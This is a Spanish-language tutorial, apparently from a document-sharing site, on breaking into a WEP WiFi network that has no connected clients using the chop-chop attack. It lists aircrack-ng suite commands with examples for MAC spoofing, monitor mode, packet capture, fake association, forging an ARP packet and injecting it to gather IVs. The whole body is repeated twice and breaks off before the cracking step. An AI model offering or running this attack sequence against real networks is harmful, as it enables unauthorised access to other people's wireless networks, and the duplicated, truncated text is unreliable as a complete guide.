Como Hackear
Páginas: 5 (1065 palabras)
Publicado: 31 de mayo de 2012
Hackear una red WiFi sin clientes conectados : Aprende a hackear una red WiFi sin clientes mediante el ataque Chop-Chop
Este manual está orientado para generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi), (si no hay clientes no hay tráfico), es un ataque que una vez hecho genera mucho tráfico, pero no siempre funciona con todas las redes wifis.
Una vez aclaradoésto podemos empezar (he utilizado Wifiway 1.0 Final) .
Lo podéis descargar de aquí:
Descarga Wifiway 1.0 Final Gratis
El MD5 de este archivo es: 2fac135cad7b185706bbcb9c51f45932 COMPROBADLO!!
Cambiar la MAC de nuestra tarjeta wireless:
Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0
Ponemos la tarjeta en modomonitor para poder coger los paquetes
Como en el anterior manual dijimos…
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Abrimos airodump para apuntar canal, bssid y el ssid
Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha redwifi.
Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.
Nos asociamos a la red wifi (Asociación Falsa)
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10-e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Lanzamos el ataque chop chop
Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.
No cerréis la consola, porque si lo hacéis luegoos tiraréis de los pelos…
Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP dela red wifi.
Fabricar paquete ARP para inyectarlo
Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete
Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024-h 00:01:02:03:04:05 -r paquete wlan0
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema.
Esperar a que haya suficientes IVs
Ahora esperamos hasta que los #data de la pantalla del...
Este manual está orientado para generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi), (si no hay clientes no hay tráfico), es un ataque que una vez hecho genera mucho tráfico, pero no siempre funciona con todas las redes wifis.
Una vez aclaradoésto podemos empezar (he utilizado Wifiway 1.0 Final) .
Lo podéis descargar de aquí:
Descarga Wifiway 1.0 Final Gratis
El MD5 de este archivo es: 2fac135cad7b185706bbcb9c51f45932 COMPROBADLO!!
Cambiar la MAC de nuestra tarjeta wireless:
Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0
Ponemos la tarjeta en modomonitor para poder coger los paquetes
Como en el anterior manual dijimos…
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Abrimos airodump para apuntar canal, bssid y el ssid
Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha redwifi.
Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.
Nos asociamos a la red wifi (Asociación Falsa)
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10-e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Lanzamos el ataque chop chop
Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.
No cerréis la consola, porque si lo hacéis luegoos tiraréis de los pelos…
Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP dela red wifi.
Fabricar paquete ARP para inyectarlo
Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete
Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024-h 00:01:02:03:04:05 -r paquete wlan0
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema.
Esperar a que haya suficientes IVs
Ahora esperamos hasta que los #data de la pantalla del...
Leer documento completo
Regístrate para leer el documento completo.